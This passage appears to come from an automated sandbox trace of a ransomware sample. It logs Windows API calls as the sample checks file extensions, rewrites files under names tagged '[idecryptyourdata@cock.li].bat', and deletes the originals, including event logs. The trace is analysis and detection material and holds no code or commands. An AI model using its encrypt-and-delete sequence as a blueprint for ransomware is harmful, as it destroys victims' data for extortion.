lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0057.121] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xe8, lpOverlapped=0x0) returned 1 [0057.121] SetEndOfFile (hFile=0x2e4) returned 1 [0057.121] CloseHandle (hObject=0x2e4) returned 1 [0057.125] SetFilePointerEx (in: hFile=0x34c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.125] SetEndOfFile (hFile=0x34c) returned 1 [0057.126] CloseHandle (hObject=0x34c) returned 1 [0057.126] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0057.127] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll")) returned 1 [0057.127] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.127] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.127] lstrlenW (lpString=".doc") returned 4 [0057.127] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0057.127] lstrlenW (lpString=".docx") returned 5 [0057.127] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0057.127] lstrlenW (lpString=".pdf") returned 4 [0057.127] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0057.815] lstrlenW (lpString=".xls") returned 4 [0057.815] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0057.815] lstrlenW (lpString=".xlsx") returned 5 [0057.815] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0057.815] lstrlenW (lpString=".ppt") returned 4 [0057.815] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0057.815] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.815] lstrlenW (lpString=".zip") returned 4 [0057.815] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0057.815] lstrlenW (lpString=".rar") returned 4 [0057.815] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0057.815] lstrlenW (lpString=".bz2") returned 4 [0057.815] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0057.815] lstrlenW (lpString=".7z") returned 3 [0057.815] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0057.815] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.815] lstrlenW (lpString=".dbf") returned 4 [0057.815] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0057.815] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.815] lstrlenW (lpString=".1cd") returned 4 [0057.815] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0057.815] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.815] lstrlenW (lpString=".jpg") returned 4 [0057.815] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0057.816] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.816] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.816] lstrlenW (lpString=".doc") returned 4 [0057.816] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0057.816] lstrlenW (lpString=".docx") returned 5 [0057.816] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0057.816] lstrlenW (lpString=".pdf") returned 4 [0057.816] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0057.816] lstrlenW (lpString=".xls") returned 4 [0057.816] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0057.816] lstrlenW (lpString=".xlsx") returned 5 [0057.816] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0057.816] lstrlenW (lpString=".ppt") returned 4 [0057.816] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0057.816] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.816] lstrlenW (lpString=".zip") returned 4 [0057.816] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0057.816] lstrlenW (lpString=".rar") returned 4 [0057.816] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0057.816] lstrlenW (lpString=".bz2") returned 4 [0057.816] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0057.816] lstrlenW (lpString=".7z") returned 3 [0057.816] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0057.816] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.816] lstrlenW (lpString=".dbf") returned 4 [0057.816] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0057.816] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.816] lstrlenW (lpString=".1cd") returned 4 [0057.816] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0057.816] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0057.816] lstrlenW (lpString=".jpg") returned 4 [0057.816] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0057.817] lstrcmpiW (lpString1=".msu", lpString2=".bat") returned 1 [0057.817] lstrlenW (lpString="Windows6.1-KB958488-v6001-x64.msu") returned 33 [0057.817] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0057.817] GetFileSizeEx (in: hFile=0x36c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=5091790) returned 1 [0057.817] CloseHandle (hObject=0x36c) returned 1 [0057.817] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu")) returned 0x80 [0057.817] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.817] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0057.818] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0057.818] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc64 | out: lpNewFilePointer=0x0) returned 1 [0057.818] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc24 | out: lpNewFilePointer=0x0) returned 1 [0057.818] ReadFile (in: hFile=0x36c, lpBuffer=0x3e08058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x30cfc30, lpOverlapped=0x0 | out: lpBuffer=0x3e08058*, lpNumberOfBytesRead=0x30cfc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.822] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x19e5ef, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc24 | out: lpNewFilePointer=0x0) returned 1 [0057.822] ReadFile (in: hFile=0x36c, lpBuffer=0x3e48058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x30cfc30, lpOverlapped=0x0 | out: lpBuffer=0x3e48058*, lpNumberOfBytesRead=0x30cfc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.825] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x30cfc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.825] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x49b1ce, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc24 | out: lpNewFilePointer=0x0) returned 1 [0057.825] ReadFile (in: hFile=0x36c, lpBuffer=0x3e88058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x30cfc30, lpOverlapped=0x0 | out: lpBuffer=0x3e88058*, lpNumberOfBytesRead=0x30cfc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.842] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.842] WriteFile (in: hFile=0x36c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x30cfca8, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfca8*=0xc012e, lpOverlapped=0x0) returned 1 [0058.380] SetEndOfFile (hFile=0x36c) returned 1 [0058.380] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x43910d8 [0058.380] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc74 | out: lpNewFilePointer=0x0) returned 1 [0058.380] WriteFile (in: hFile=0x36c, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x30cfc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x30cfc80*=0x40000, lpOverlapped=0x0) returned 1 [0058.381] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x19e5ef, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc74 | out: lpNewFilePointer=0x0) returned 1 [0058.382] WriteFile (in: hFile=0x36c, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x30cfc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x30cfc80*=0x40000, lpOverlapped=0x0) returned 1 [0058.383] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x49b1ce, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc74 | out: lpNewFilePointer=0x0) returned 1 [0058.383] WriteFile (in: hFile=0x36c, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x30cfc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x30cfc80*=0x40000, lpOverlapped=0x0) returned 1 [0058.385] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0058.385] CloseHandle (hObject=0x36c) returned 1 [0060.683] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0060.684] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.684] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.684] lstrlenW (lpString=".doc") returned 4 [0060.684] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0060.684] lstrlenW (lpString=".docx") returned 5 [0060.684] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0060.684] lstrlenW (lpString=".pdf") returned 4 [0060.684] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0060.684] lstrlenW (lpString=".xls") returned 4 [0060.684] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0060.684] lstrlenW (lpString=".xlsx") returned 5 [0060.684] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0060.684] lstrlenW (lpString=".ppt") returned 4 [0060.684] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0060.684] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.684] lstrlenW (lpString=".zip") returned 4 [0060.684] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0060.684] lstrlenW (lpString=".rar") returned 4 [0060.684] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0060.684] lstrlenW (lpString=".bz2") returned 4 [0060.684] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0060.684] lstrlenW (lpString=".7z") returned 3 [0060.684] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0060.684] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.684] lstrlenW (lpString=".dbf") returned 4 [0060.684] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0060.684] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.684] lstrlenW (lpString=".1cd") returned 4 [0060.684] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0060.684] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.684] lstrlenW (lpString=".jpg") returned 4 [0060.684] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0060.684] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.684] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.685] lstrlenW (lpString=".doc") returned 4 [0060.685] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0060.685] lstrlenW (lpString=".docx") returned 5 [0060.685] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0060.685] lstrlenW (lpString=".pdf") returned 4 [0060.685] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0060.685] lstrlenW (lpString=".xls") returned 4 [0060.685] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0060.685] lstrlenW (lpString=".xlsx") returned 5 [0060.685] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0060.685] lstrlenW (lpString=".ppt") returned 4 [0060.685] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0060.685] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.685] lstrlenW (lpString=".zip") returned 4 [0060.685] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0060.685] lstrlenW (lpString=".rar") returned 4 [0060.685] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0060.685] lstrlenW (lpString=".bz2") returned 4 [0060.685] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0060.685] lstrlenW (lpString=".7z") returned 3 [0060.685] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0060.685] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.685] lstrlenW (lpString=".dbf") returned 4 [0060.685] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0060.685] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.685] lstrlenW (lpString=".1cd") returned 4 [0060.685] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0060.685] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0060.685] lstrlenW (lpString=".jpg") returned 4 [0060.685] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0060.685] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0060.685] lstrlenW (lpString="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 78 [0060.686] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0061.223] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0061.223] CloseHandle (hObject=0x2c0) returned 1 [0061.223] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx")) returned 0x20 [0061.223] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.223] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0061.223] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.223] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.223] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0061.224] GetLastError () returned 0x0 [0061.224] ReadFile (in: hFile=0x2c0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0061.226] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0061.228] ReadFile (in: hFile=0x2c0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.228] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x170, lpOverlapped=0x0) returned 1 [0061.229] SetEndOfFile (hFile=0x37c) returned 1 [0061.229] CloseHandle (hObject=0x37c) returned 1 [0061.231] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.231] SetEndOfFile (hFile=0x2c0) returned 1 [0061.233] CloseHandle (hObject=0x2c0) returned 1 [0061.233] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0061.233] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx")) returned 1 [0061.233] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.233] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.233] lstrlenW (lpString=".doc") returned 4 [0061.233] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.233] lstrlenW (lpString=".docx") returned 5 [0061.233] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.234] lstrlenW (lpString=".pdf") returned 4 [0061.234] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.234] lstrlenW (lpString=".xls") returned 4 [0061.234] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.234] lstrlenW (lpString=".xlsx") returned 5 [0061.234] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.234] lstrlenW (lpString=".ppt") returned 4 [0061.234] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.234] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.234] lstrlenW (lpString=".zip") returned 4 [0061.234] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.234] lstrlenW (lpString=".rar") returned 4 [0061.234] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.234] lstrlenW (lpString=".bz2") returned 4 [0061.234] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.234] lstrlenW (lpString=".7z") returned 3 [0061.234] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.234] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.235] lstrlenW (lpString=".dbf") returned 4 [0061.235] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.235] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.235] lstrlenW (lpString=".1cd") returned 4 [0061.235] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.235] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.235] lstrlenW (lpString=".jpg") returned 4 [0061.235] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.235] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.235] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.235] lstrlenW (lpString=".doc") returned 4 [0061.235] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.235] lstrlenW (lpString=".docx") returned 5 [0061.235] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.235] lstrlenW (lpString=".pdf") returned 4 [0061.235] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.235] lstrlenW (lpString=".xls") returned 4 [0061.236] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.236] lstrlenW (lpString=".xlsx") returned 5 [0061.236] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.236] lstrlenW (lpString=".ppt") returned 4 [0061.236] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.236] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.236] lstrlenW (lpString=".zip") returned 4 [0061.236] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.236] lstrlenW (lpString=".rar") returned 4 [0061.236] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.236] lstrlenW (lpString=".bz2") returned 4 [0061.236] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.236] lstrlenW (lpString=".7z") returned 3 [0061.236] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.236] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.236] lstrlenW (lpString=".dbf") returned 4 [0061.236] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.236] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.236] lstrlenW (lpString=".1cd") returned 4 [0061.236] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.236] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0061.236] lstrlenW (lpString=".jpg") returned 4 [0061.236] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.236] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0061.236] lstrlenW (lpString="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 71 [0061.236] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0061.237] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=1052672) returned 1 [0061.237] CloseHandle (hObject=0x2c0) returned 1 [0061.237] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx")) returned 0x20 [0061.237] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.237] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0061.238] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.238] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.238] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0061.238] GetLastError () returned 0x0 [0061.238] ReadFile (in: hFile=0x2c0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0061.256] WriteFile 